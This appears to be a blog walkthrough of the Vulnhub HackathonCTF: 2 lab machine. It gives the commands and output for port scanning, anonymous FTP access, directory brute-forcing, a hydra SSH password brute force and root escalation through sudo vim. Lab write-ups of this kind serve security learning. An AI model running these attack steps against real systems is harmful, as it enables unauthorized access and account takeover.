日度归档:2021 年 6 月 27 日

Vulnhub HackathonCTF: 2 Walkthrough

发表评论

Vulnhub HackathonCTF: 2 Walkthrough

https://www.vulnhub.com/entry/hackathonctf-2,714/

Difficulty: Easy

Scan ports.

 ~ nmap -sV -sC -p- 192.168.33.140  -oN ports.log            
 Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-27 17:17 CST
 Nmap scan report for bogon (192.168.33.140)              
 PORT     STATE SERVICE VERSION
 21/tcp   open  ftp     vsftpd 3.0.3
 | ftp-anon: Anonymous FTP login allowed (FTP code 230)
 | -rw-r--r--    1 1000     1000           47 Jun 18 17:32 flag1.txt
 |_-rw-r--r--    1 1000     1000          849 Jun 19 05:11 word.dir
 ...
 80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
 | http-robots.txt: 1 disallowed entry                                                 ...
 7223/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
 ...

Get a dic file from ftp.

 ~ ftp 192.168.33.140                                            
 Connected to 192.168.33.140.                                    
 220 (vsFTPd 3.0.3)                                              
 Name (192.168.33.140:kali): anonymous                            
 331 Please specify the password.                                
 Password:                                                        
 230 Login successful.                                            
 Remote system type is UNIX.                                      
 Using binary mode to transfer files.                            
 ftp> ls -la                                                      
 200 PORT command successful. Consider using PASV.                
 150 Here comes the directory listing.                            
 drwxr-xr-x    2 0        118          4096 Jun 19 05:11 .        
 drwxr-xr-x    2 0        118          4096 Jun 19 05:11 ..      
 -rw-r--r--    1 1000     1000           47 Jun 18 17:32 flag1.txt
 -rw-r--r--    1 1000     1000          849 Jun 19 05:11 word.dir
 226 Directory send OK.                                          
 ftp> get word.dir                                                
 local: word.dir remote: word.dir

Scan folders and files of port 80.

~ gobuster dir -u http://192.168.33.140 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log
 ===============================================================
 /index.html           (Status: 200) [Size: 1254]
 /robots.txt           (Status: 200) [Size: 70]
 /happy                (Status: 200) [Size: 110]

Visit /happy, check source code, found username hackathonll.

```
~ curl http://192.168.33.140/happy
<html>
<title>happy</title>

<body><h1> Nothing is in here</h1></body>

<!-- username: hackathonll >

</html>


Brute force ssh with this username and the dic file.

~ hydra -l hackathonll -P word.dir 192.168.33.140 -s 7223 ssh -t64 -f
...
[DATA] attacking ssh://192.168.33.140:7223/
[7223][ssh] host: 192.168.33.140 login: hackathonll password: Ti@gO
[STATUS] attack finished for 192.168.33.140 (valid pair found)
1 of 1 target successfully completed, 1 valid password found 

Ssh login, check sudo -l.

 ```
~ ssh hackathonll@192.168.33.140 -p 7223
 ...
 $ sudo -l
 Matching Defaults entries for hackathonll on hackathon:
     env_reset, mail_badpass,
 secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
 User hackathonll may run the following commands on hackathon:
     (root) NOPASSWD: /usr/bin/vim

Sudo run vim, press ":", then input "!/bin/bash", and became root.

$ sudo vim                            

 root@hackathon:/home/hackathonll# id  
 uid=0(root) gid=0(root) groups=0(root)